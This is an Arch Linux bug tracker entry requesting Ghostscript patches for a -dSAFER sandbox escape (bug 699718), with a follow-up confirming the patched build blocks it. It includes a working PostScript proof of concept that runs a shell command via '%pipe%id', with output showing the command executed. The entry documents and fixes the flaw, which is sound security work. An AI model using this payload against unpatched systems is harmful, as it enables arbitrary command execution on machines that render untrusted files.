FS#59982 - [ghostscript] Add fixes for yet another exploit [bug: 699718]

Attached to Project: Arch Linux
Opened by Tommy Schmitt (spinka) - Saturday, 08 September 2018, 11:03 GMT
Last edited by Andreas Radke (AndyRTR) - Sunday, 09 September 2018, 12:14 GMT
Task Type Bug Report
Category Packages: Extra
Status Closed
Assigned To Andreas Radke (AndyRTR)
Architecture All
Severity Critical
Priority Normal
Reported Version
Due in Version Undecided
Due Date Undecided
Percent Complete 100%
Votes 1
Private No

Details

Description:

https://bugs.chromium.org/p/project-zero/issues/detail?id=1640#c25

The following patches should fix this:

http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=3e5d316b72e3965b7968bb1d96baa137cd063ac6
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=643b24dbd002


Steps to reproduce:
$ cat bug699718.txt
%!PS
% This is bug 699718, trysetparams stopped proc can itself stop, leaving page device in insecure state
currentpagedevice /PageSize get 0 (foobar) put
a0
% fill up the stack with junk, so the error handler generates a /stackoverflow
0 1 300360 {} for
{ grestore } stopped clear
(ppmraw) selectdevice
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage

$ gs -dSAFER bug699718.txt
GPL Ghostscript GIT PRERELEASE 9.25 (2018-09-03)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
uid=1000(user) gid=100(users)
This task depends upon

Closed by  Andreas Radke (AndyRTR)
Sunday, 09 September 2018, 12:14 GMT
Reason for closing:  Fixed
Comment by Andreas Radke (AndyRTR) - Sunday, 09 September 2018, 08:40 GMT
Try 9.24-6 with both commit patches applied.
Comment by Tommy Schmitt (spinka) - Sunday, 09 September 2018, 11:40 GMT
I can confirm it blocks latest PoC:

$ gs -dSAFER bug699718.txt
GPL Ghostscript 9.24 (2018-09-03)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
Error: /invalidaccess in --setdevice--
Operand stack:
--nostringval--
Execution stack:
%interp_exit .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval-- --nostringval-- --nostringval-- false 1 %stopped_push 2015 1 3 %oparray_pop 2014 1 3 %oparray_pop 1998 1 3 %oparray_pop 1884 1 3 %oparray_pop --nostringval-- %errorexec_pop .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval-- --nostringval-- 1886 1 3 %oparray_pop --nostringval--
Dictionary stack:
--dict:966/1684(ro)(G)-- --dict:0/20(G)-- --dict:78/200(L)--
Current allocation mode is local
Last OS error: Resource temporarily unavailable
Current file position is 304
GPL Ghostscript 9.24: Unrecoverable error, exit code 1

Loading...